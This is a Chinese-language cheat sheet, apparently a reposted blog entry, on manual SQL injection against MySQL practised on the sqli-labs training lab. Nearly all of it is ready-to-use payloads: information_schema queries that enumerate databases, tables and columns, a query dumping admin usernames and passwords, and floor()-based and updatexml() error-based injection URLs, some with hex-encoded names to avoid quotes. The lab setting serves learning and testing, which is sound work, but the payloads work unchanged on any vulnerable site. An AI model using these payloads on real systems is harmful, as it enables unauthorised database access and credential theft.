sql 手注 语法

mysql中的information_schema 结构用来存储数据库系统信息 

information_schema 结构中这几个表存储的信息，在注射中可以用到的几个表。　 


| SCHEMATA ――>存储数据库名的， 

|——>关键字段：SCHEMA_NAME，表示数据库名称 


| TABLES ――>存储表名的 

|——>关键字段：TABLE_SCHEMA表示表所属的数据库名称； 

TABLE_NAME表示表的名称 


| COLUMNS ――>存储字段名的 

|——>关键字段：TABLE_SCHEMA表示表所属的数据库名称； 

TABLE_NAME表示所属的表的名称 

　　　　COLUMN_NAME表示字段名 


可以看到，我们只要通过注射点构造查询语句遍相关字段，就可以得到我们想要的信息了。 

爆所有数据库名 


select group_concat(SCHEMA_NAME) from information_schema.schemata 


得到当前库的所有表 

select group_concat(table_name) from information_schema.tables where table_schema=database() 


得到表中的字段名 将敏感的表进行16进制编码adminuser=0x61646D696E75736572 

select group_concat(column_name) from information_schema.columns where table_name=0x61646D696E75736572 



得到字段具体的值 

select group_concat(username,0x3a,password) from adminuser

 

2. floor报错注入

and (select 1 from (select count(*),concat((payload),floor(rand(0)*2))x from information_schema.tables group by x)a)

查询当前数据库：

http://192.168.48.130/sqli-labs-master/Less-1/?id=1'  and (select 1 from (select count(*),concat((database()),floor(rand(0)*2))x from information_schema.tables group by x)a)--+

查询所有的数据库，limit来控制

http://192.168.48.130/sqli-labs-master/Less-1/?id=-1' and (select 1 from (select count(*),concat((select schema_name from information_schema.schemata limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+

 

查询security下的表名

http://192.168.48.130/sqli-labs-master/Less-1/?id=1' and (select 1 from (select count(*),concat((select table_name from information_schema.tables where table_schema='security' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+

查询security下的emails数据表的字段名

http://192.168.48.130/sqli-labs-master/Less-1/?id=1' and (select 1 from (select count(*),concat((select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+

查询security下的emails数据表的email_id字段内容

 http://192.168.48.130/sqli-labs-master/Less-1/?id=-1' and (select 1 from (select count(*),concat((select email_id from emails limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+

 

 

3. updatexml注入

and updatexml(1,payload,1)

查询当前数据库：http://192.168.48.130/sqli-labs-master/Less-1/?id=1' and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)--+

爆所有数据库：http://192.168.48.130/sqli-labs-master/Less-1/?id=1' and updatexml(1,concat(0x7e,(SELECT group_concat(schema_name) from information_schema.schemata),0x7e),1)--+ 

 

因为限制了长度是32 是显示不完全的，

这边又采用Limit来显示所有的数据库名：http://192.168.48.130/sqli-labs-master/Less-1/?id=1' and updatexml(1,concat(0x7e,(SELECT schema_name from information_schema.schemata limit 0,1),0x7e),1)--+

 一个一个查找security下的表名：http://192.168.48.130/sqli-labs-master/Less-1/?id=1' and updatexml(1,concat(0x7e,(SELECT table_name from information_schema.tables where table_schema=0x7365637572697479 limit 0,1),0x7e),1)--+

查找security下的所有表名：http://192.168.48.130/sqli-labs-master/Less-1/?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database() ),0x7e),1)--+    显示不完全

查找emails数据表中的所有列名：http://192.168.48.130/sqli-labs-master/Less-1/?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=0x656D61696C73),0x7e),1)--+

 

查找email字段内容：http://192.168.48.130/sqli-labs-master/Less-1/?id=1' and updatexml(1,concat(0x7e,(select group_concat(id,0x3a,email_id) from emails),0x7e),1)--+

 

转载于:https://www.cnblogs.com/kuaile1314/p/11237466.html